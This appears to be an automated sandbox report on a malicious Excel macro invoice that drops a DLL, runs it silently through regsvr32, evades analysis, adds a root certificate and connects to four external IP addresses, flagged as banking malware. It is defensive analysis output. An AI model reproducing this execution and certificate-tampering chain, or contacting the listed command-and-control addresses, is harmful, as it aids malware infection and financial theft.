Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00483B00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00489B10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00481730
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004783C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00477FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00487FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004767C8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0047E3F0
Source: INV9698791470-20210111920647.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV9698791470-20210111920647.xlsmOLE indicator, VBA macros: true
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804
Source: eb3kd1le[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eb3kd1le[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eb3kd1le[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eb3kd1le[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.bank.expl.evad.winXLSM@9/21@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INV9698791470-20210111920647.xlsmJump to behavior
Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2432
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD345.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: INV9698791470-20210111920647.xlsmVirustotal: Detection: 29%
Source: INV9698791470-20210111920647.xlsmReversingLabs: Detection: 17%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1804
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1804
Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: INV9698791470-20210111920647.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: INV9698791470-20210111920647.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV9698791470-20210111920647.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: eb3kd1le[1].zip.0.drStatic PE information: section name: .rdata3
Source: eb3kd1le[1].zip.0.drStatic PE information: section name: .2
Source: eb3kd1le[1].zip.0.drStatic PE information: section name: .rdata2
Source: eb3kd1le[1].zip.0.drStatic PE information: section name: .text4
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001FBFA0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001C7172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001E62CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001DF6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001C899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001C89CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001EFB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001C1D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001C0E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\deibsjhv.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001D88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2704Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -792000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -510000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -845000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -610000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -816000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -1169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -351000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -304000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -354000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -414000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -335000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -474000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -840000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -586000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -519000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -248000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -512000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -660000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -462000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -447000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -307000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -1062000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -584000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -332000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -359000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -348000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -972000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -698000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -528000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -592000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -665000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -560000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -508000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -516000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -534000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -369000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -301000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -1011000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -429000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -664000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -384000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -284000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -245000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -1113000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -522000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -273000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -635000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -331000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -548000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -525000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -262000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -295000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -285000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -325000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -334000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -317000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -275000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -319000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -141000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -299000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -279000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276Thread sleep time: -288000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2712Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0048CEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00473930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001D88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00476C50 LdrLoadDll,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001FB5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001FB6D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00477A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1804
Source: regsvr32.exe, 00000003.00000002.2382209582.00000000008A0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382512922.0000000000980000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2382209582.00000000008A0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382512922.0000000000980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2382209582.00000000008A0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382512922.0000000000980000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00472980 GetUserNameW,
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior

Mitre Att&ck Matrix

